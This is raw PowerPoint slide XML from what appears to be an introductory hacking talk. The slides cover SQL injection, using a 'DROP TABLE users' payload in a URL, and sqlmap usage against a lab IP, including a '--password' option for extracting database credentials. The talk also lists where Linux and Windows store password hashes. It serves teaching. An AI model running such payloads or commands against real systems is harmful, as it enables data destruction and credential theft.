        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4816269" y="3059376"/>
            <a:ext cx="6080328"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id=”+id+”;”</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="12" name="TextBox 11">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{CD49ADFF-63AC-B147-B56A-7E009F8EE8B4}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4816268" y="3418294"/>
            <a:ext cx="6080328"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id=4;”</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="13" name="TextBox 12">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{85719D82-0549-2141-8682-2AA4B16E1A2E}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4816267" y="4020977"/>
            <a:ext cx="6798790" cy="369332"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>http://</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>target.net</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>page.php?id</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>=4; DROP TABLE users</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="14" name="TextBox 13">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{40999803-52FE-F74F-89FE-53548837A52D}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4816267" y="4824133"/>
            <a:ext cx="6080328"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id=”+id+”;”</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="15" name="Down Arrow 14">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{26A25A58-FC60-BE41-8C32-D41F85AC4E9C}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="517940">
            <a:off x="8779213" y="4359477"/>
            <a:ext cx="446314" cy="509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53BF576-6E68-B145-AA0D-F661101BAB58}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4816267" y="5215207"/>
            <a:ext cx="6591962" cy="338554"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="squar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“SELECT * FROM items WHERE id=4; DROP TABLE users;</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="109061963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F8401C5-AA07-D943-8C2A-102391D93D13}"/>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descr="Needle">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{1F81E5D2-F58D-2445-A0F6-6D0DA79D3100}"/>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816270" y="959547"/>
            <a:ext cx="914400" cy="914400"/>
          </a:xfrm>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="10" name="TextBox 9">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{C41B9C53-E184-C14B-9112-D7A2F06D2B80}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5730670" y="1268078"/>
            <a:ext cx="2408032" cy="523220"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0"/>
              <a:t>SQL Injection</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="TextBox 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{EC9BA853-A72E-1144-BB73-652798A4A83D}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4816269" y="2144486"/>
            <a:ext cx="7277753" cy="2585323"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>SQL Map:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t># </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>sqlmap</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>-u [URL]</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>--batch (Answers all questions)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>--delay [#] (Seconds to wait between requests</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>--random-agent (sets the User Agent field to something random)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="336527488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F02054-E411-464E-87A4-B965C6F539CB}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="643467" y="516835"/>
            <a:ext cx="2994815" cy="1666501"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="4000">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>About Me</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="23" name="Straight Connector 2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CA44C5ED-73E7-443A-B0C4-51B695A9F464}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="643467" y="2546224"/>
            <a:ext cx="2994815" cy="3342747"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>- 2 Year Partner</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>- Hack for fun</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>- </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:hlinkClick r:id="rId2"/>
              </a:rPr>
              <a:t>https://hackthebox.eu</a:t>
            </a:r>
            <a:endParaRPr lang="en-US">
              <a:solidFill>
                <a:schemeClr val="tx1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>- Certifications</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="1800">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>OSCP</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="1800">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>GPEN</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="4" name="Content Placeholder 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{1A9D1EBA-E591-E147-AB40-7DEE95A8D321}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="9196995" y="3642840"/>
            <a:ext cx="1794762" cy="1794762"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="5" name="Picture 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{3B0FF8B1-532C-CD46-878A-0BA88156FFF3}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId4"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="9196995" y="1350085"/>
            <a:ext cx="1794762" cy="1794762"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="3" name="Picture 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{CA6B777E-86F8-A247-B7AB-F85B2E177B60}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId5"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="4124960" y="1286194"/>
            <a:ext cx="4257040" cy="4285611"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="201709521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F8401C5-AA07-D943-8C2A-102391D93D13}"/>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descr="Needle">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{1F81E5D2-F58D-2445-A0F6-6D0DA79D3100}"/>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816270" y="959547"/>
            <a:ext cx="914400" cy="914400"/>
          </a:xfrm>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="10" name="TextBox 9">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{C41B9C53-E184-C14B-9112-D7A2F06D2B80}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5730670" y="1268078"/>
            <a:ext cx="2408032" cy="523220"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0"/>
              <a:t>SQL Injection</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="TextBox 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{EC9BA853-A72E-1144-BB73-652798A4A83D}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4816269" y="2144486"/>
            <a:ext cx="7856973" cy="2800767"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>SQL Map:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t># </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>sqlmap</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>-u [URL]</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>--batch (Answers all questions)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>--delay [#] (Seconds to wait between requests</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>--random-agent (sets the User Agent field to something random)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0"/>
              <a:t># </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" err="1"/>
              <a:t>sqlmap</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0"/>
              <a:t> –delay 2 –random-agent –u http://10.10.10.143/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" err="1"/>
              <a:t>room.php?cod</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0"/>
              <a:t>=1</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" sz="1600" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="121270231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F8401C5-AA07-D943-8C2A-102391D93D13}"/>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descr="Needle">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{1F81E5D2-F58D-2445-A0F6-6D0DA79D3100}"/>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4816270" y="959547"/>
            <a:ext cx="914400" cy="914400"/>
          </a:xfrm>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="10" name="TextBox 9">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{C41B9C53-E184-C14B-9112-D7A2F06D2B80}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5730670" y="1268078"/>
            <a:ext cx="2408032" cy="523220"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0"/>
              <a:t>SQL Injection</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="TextBox 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{EC9BA853-A72E-1144-BB73-652798A4A83D}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4816269" y="2144486"/>
            <a:ext cx="7856973" cy="3046988"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>SQL Map:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t># </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>sqlmap</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>-u [URL]</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>--batch (Answers all questions)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>--delay [#] (Seconds to wait between requests</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>--random-agent (sets the User Agent field to something random)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0"/>
              <a:t># </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" err="1"/>
              <a:t>sqlmap</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0"/>
              <a:t> –delay 2 –random-agent –u http://10.10.10.143/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" err="1"/>
              <a:t>room.php?cod</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0"/>
              <a:t>=1</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" sz="1600" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0"/>
              <a:t>Add “—password” and it will try to get database access credentials.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="326760034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030E7ED3-BC2B-BE4E-8F40-2B766D479F41}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4816269" y="1043427"/>
            <a:ext cx="6630231" cy="2385573"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1700">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Password Cracking</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1500">
              <a:solidFill>
                <a:srgbClr val="FFFFFF"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1500">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Where are passwords stored?</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1500">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Linux:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1500">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1500" err="1">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>etc</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1500">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>/passwd</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1500">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1500" err="1">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>etc</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1500">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>/shadow</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1700">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Windows:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1500">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>SAM Database</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="1500">
              <a:solidFill>
                <a:srgbClr val="FFFFFF"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="201168" lvl="1" indent="0">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="1500">
              <a:solidFill>
                <a:srgbClr val="FFFFFF"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Rectangle 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{5A7CA5B4-80CC-C44E-ACAA-6122588012A0}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8383605" y="1075939"/>
            <a:ext cx="2645083" cy="383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Password</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Down Arrow 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{E0C5C27B-EE6F-E74A-B465-D11F2B5D7F0D}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="9368054" y="1554302"/>
            <a:ext cx="693683" cy="316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261679-C3F6-064B-BB76-F2E5FBEE2EA6}"/>
